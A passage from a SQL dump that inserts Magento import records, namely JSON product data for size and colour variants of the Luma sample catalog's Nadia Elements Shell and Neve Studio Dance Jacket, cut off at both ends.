y\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1297\":{\"sku\":\"WJ10-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-L-Yellow\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1298\":{\"sku\":\"WJ10-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-XL-Black\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1299\":{\"sku\":\"WJ10-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-XL-Orange\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(14, 'catalog_product', 'append', '{\"1300\":{\"sku\":\"WJ10-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-XL-Yellow\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1301\":{\"sku\":\"WJ10\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Insulated|Jacket|Rain Coat|Hard Shell|Windbreaker|Full zip,material=Nylon|Polyester|CoolTech&trade;,pattern=Solid,climate=Cool|Mild|Rainy|Spring|Windy,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ10-XS-Black,size=XS,color=Black|sku=WJ10-XS-Orange,size=XS,color=Orange|sku=WJ10-XS-Yellow,size=XS,color=Yellow|sku=WJ10-S-Black,size=S,color=Black|sku=WJ10-S-Orange,size=S,color=Orange|sku=WJ10-S-Yellow,size=S,color=Yellow|sku=WJ10-M-Black,size=M,color=Black|sku=WJ10-M-Orange,size=M,color=Orange|sku=WJ10-M-Yellow,size=M,color=Yellow|sku=WJ10-L-Black,size=L,color=Black|sku=WJ10-L-Orange,size=L,color=Orange|sku=WJ10-L-Yellow,size=L,color=Yellow|sku=WJ10-XL-Black,size=XL,color=Black|sku=WJ10-XL-Orange,size=XL,color=Orange|sku=WJ10-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Insulated|Jacket|Rain Coat|Hard Shell|Windbreaker|Full zip\",\"material\":\"Nylon|Polyester|CoolTech&trade;\",\"pattern\":\"Solid\",\"climate\":\"Cool|Mild|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1302\":{\"sku\":\"WJ11-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-XS-Black\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1303\":{\"sku\":\"WJ11-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-XS-Blue\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1304\":{\"sku\":\"WJ11-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-XS-Orange\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"mana